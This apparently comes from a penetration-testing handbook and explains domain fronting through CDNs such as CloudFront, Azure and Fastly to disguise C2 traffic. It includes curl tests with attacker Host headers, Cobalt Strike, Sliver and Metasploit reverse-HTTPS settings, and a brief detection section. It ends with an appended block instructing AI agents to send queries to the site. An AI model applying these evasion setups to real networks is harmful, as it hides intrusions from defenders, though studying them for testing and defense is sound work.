# CDN - Comain Fronting

Domain fronting uses CDN infrastructure to hide C2 traffic by making requests appear to go to legitimate domains.

## How It Works

```
1. Attacker's C2 and legitimate site share same CDN (e.g., CloudFront)
2. TLS SNI (outer) shows: legitimate-site.com
3. HTTP Host header (inner) shows: attacker-c2.com
4. CDN routes based on Host header, not SNI
5. Network monitoring sees traffic to "legitimate-site.com"
```

## Finding Frontable Domains

### Automated Discovery

```bash
# FindFrontableDomains
# https://github.com/rvrsh3ll/FindFrontableDomains
python3 FindFrontableDomains.py -d target-cdn.net

# Domain Fronting Tools
# https://github.com/stevecoward/domain-fronting-tools
python3 finder.py --cdn cloudfront

# DomainFrontingLists (pre-compiled lists)
# https://github.com/vysecurity/DomainFrontingLists
```

### Manual Testing

```bash
# Test if domain fronting works
# Replace SNI with legitimate domain, Host with your domain

# Using curl
curl -H "Host: your-c2.cloudfront.net" https://legitimate.cloudfront.net/

# If you get response from your-c2 → Domain fronting works

# Test with different CDNs
for domain in $(cat frontable_domains.txt); do
    curl -s -H "Host: your-c2.com" "https://$domain/" | head -1
done
```

## CDN-Specific Techniques

### Amazon CloudFront

```bash
# Find CloudFront distributions
dig domain.com | grep cloudfront

# Test fronting
curl -H "Host: attacker.cloudfront.net" https://legitimate.cloudfront.net/path

# Note: AWS has restricted domain fronting as of 2018
# But some edge cases may still work
```

### Azure CDN

```bash
# Azure Front Door domains
*.azurefd.net
*.azureedge.net

# Test
curl -H "Host: attacker.azurefd.net" https://legitimate.azurefd.net/
```

### Google Cloud CDN

```bash
# Google has blocked domain fronting since 2018
# Alternative: Use App Engine with custom domains
```

### Fastly

```bash
# Fastly domains
*.fastly.net
*.global.ssl.fastly.net

curl -H "Host: attacker.global.ssl.fastly.net" https://legitimate.global.ssl.fastly.net/
```

### Cloudflare

```bash
# Cloudflare domains
*.cloudflare.com

# Note: Cloudflare has mitigations in place
# Workers may be alternative approach
```

## TLS 1.3 Considerations

```bash
# TLS 1.3 encrypts more of the handshake
# SNI is still visible unless using ECH (Encrypted Client Hello)

# Noctilucent - TLS 1.3 Domain Fronting
# https://github.com/SixGenInc/Noctilucent
# Exploits TLS 1.3 session resumption
```

## C2 Framework Integration

### Cobalt Strike

```
# Malleable C2 profile for domain fronting
http-get {
    set uri "/search";
    client {
        header "Host" "your-c2.cloudfront.net";
    }
}

# Listener setup:
# Host: legitimate.cloudfront.net
# Host Header: your-c2.cloudfront.net
```

### Sliver

```bash
# Generate implant with domain fronting
sliver > https -d legitimate.cloudfront.net -H your-c2.cloudfront.net

# Or in implant config
sliver > generate --http legitimate.cloudfront.net --http-header "Host:your-c2.cloudfront.net"
```

### Metasploit

```bash
# Reverse HTTPS with domain fronting
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST your-c2.cloudfront.net
set HttpHostHeader legitimate.cloudfront.net
set OverrideRequestHost true
```

## Detection & Defense

```
# Indicators to monitor:
1. Mismatch between SNI and Host header
2. Unusual CDN traffic patterns
3. Long-lived HTTPS sessions to CDN edges
4. POST requests to CDN (vs typical GET for static content)

# Defensive measures:
1. Block known CDN IP ranges (drastic)
2. SSL/TLS inspection to compare SNI vs Host
3. Monitor for C2 framework signatures in traffic
4. Analyze CDN logs for suspicious patterns
```

## Alternatives When Fronting Fails

```bash
# CDN as redirector
# Set up CDN to proxy to your actual C2

# Serverless redirectors
# Use Lambda@Edge, Cloudflare Workers to redirect

# Legitimate cloud services
# Use Azure Blob, S3 buckets as dead drops
```

## Tools

```bash
# Domain Fronting Finder
https://github.com/rvrsh3ll/FindFrontableDomains

# Domain Fronting Tools
https://github.com/stevecoward/domain-fronting-tools

# TLS 1.3 Fronting
https://github.com/SixGenInc/Noctilucent

# Pre-compiled Lists
https://github.com/vysecurity/DomainFrontingLists
```

## Related Topics

* [C2 Frameworks](/exploitation/web-exploits.md) - C2 framework usage
* [RT/EDR Evasion](/others/rt-edr.md) - Evasion techniques
* [SSRF](/enumeration/web/ssrf.md) - CDN can be SSRF target


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentest-book.com/enumeration/cloud/cdn-comain-fronting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.